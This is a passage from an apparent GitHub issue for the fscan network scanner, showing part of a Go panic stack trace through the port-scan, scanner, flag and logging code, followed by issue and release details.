            github.com/shadow1ng/fscan/Plugins/portscan.go:39 +0x2f4 fp=0xc00030dcc8 sp=0xc00030dad8 pc=0xac6db4
    github.com/shadow1ng/fscan/Plugins.Scan({{0x0, 0x0}, {0xc0001e0480, 0x45c}, {0x0, 0x0}, {0x0, 0x0, 0x0}})
            github.com/shadow1ng/fscan/Plugins/scanner.go:37 +0x310 fp=0xc00030def8 sp=0xc00030dcc8 pc=0xacd010
    main.main()
            github.com/shadow1ng/fscan/main.go:14 +0x85 fp=0xc00030df80 sp=0xc00030def8 pc=0xad3545
    runtime.main()
            runtime/proc.go:255 +0x227 fp=0xc00030dfe0 sp=0xc00030df80 pc=0x435cc7
    runtime.goexit()
            runtime/asm_amd64.s:1581 +0x1 fp=0xc00030dfe8 sp=0xc00030dfe0 pc=0x462de1

    goroutine 6 [sleep]:
    time.Sleep(0x2540be400)
            runtime/time.go:193 +0x12e
    github.com/shadow1ng/fscan/common.init.0.func1()
            github.com/shadow1ng/fscan/common/flag.go:15 +0x2e
    created by github.com/shadow1ng/fscan/common.init.0
            github.com/shadow1ng/fscan/common/flag.go:11 +0x25

    goroutine 7 [chan receive]:
    github.com/shadow1ng/fscan/common.SaveLog()
            github.com/shadow1ng/fscan/common/log.go:32 +0x54
    created by github.com/shadow1ng/fscan/common.init.1
            github.com/shadow1ng/fscan/common/log.go:22 +0x25

    opened by fengx1a0 1
Releases (1.8.1)
Owner
影舞者